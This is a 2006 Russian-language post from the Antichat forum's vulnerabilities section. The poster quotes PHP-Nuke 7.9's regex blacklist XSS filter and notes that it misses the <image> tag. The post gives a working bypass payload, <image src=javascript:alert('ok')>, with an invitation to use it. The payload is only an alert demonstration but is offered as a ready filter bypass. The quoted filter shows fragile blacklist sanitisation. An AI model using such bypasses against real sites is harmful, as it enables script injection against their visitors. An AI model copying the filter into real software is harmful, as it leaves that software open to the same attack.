ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу баг в PHP-Nuke 7.9
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

баг в PHP-Nuke 7.9
  #1  
Старый 23.02.2006, 14:52
Аватар для Dr0ne
Dr0ne
Новичок
Регистрация: 22.02.2006
Сообщений: 12
Провел на форуме:
39733

Репутация: 3
По умолчанию баг в PHP-Nuke 7.9
я просмотрел код нюки на русском на нашел брешь в проверке на XSS
PHP код:
if (!defined('ADMIN_FILE')) {      foreach ($_GET as $sec_key => $secvalue) {          if ((eregi("<[^>]*script*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*object*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*iframe*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*applet*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*meta*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*style*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*form*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*img*\"?[^>]*>"$secvalue)) ||          (eregi("<[^>]*onmouseover*\"?[^>]*>"$secvalue)) ||          (eregi("\([^>]*\"?[^)]*\)"$secvalue)) ||          (eregi("\""$secvalue)) ||          (eregi("forum_admin"$sec_key)) ||          (eregi("inside_mod"$sec_key))) { 
тут нет проверки на тэг <image >
атаку можно провести так
Код HTML:
<image src=javascript:alert('ok')>
пользуйтесь. будут вопросы - обращайтесь
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Пишем Php код, устойчивый к ошибкам k00p3r Чужие Статьи 0 10.07.2005 22:34
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
PHP vs mod_rewrite Trinux PHP, PERL, MySQL, JavaScript 11 13.05.2005 21:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ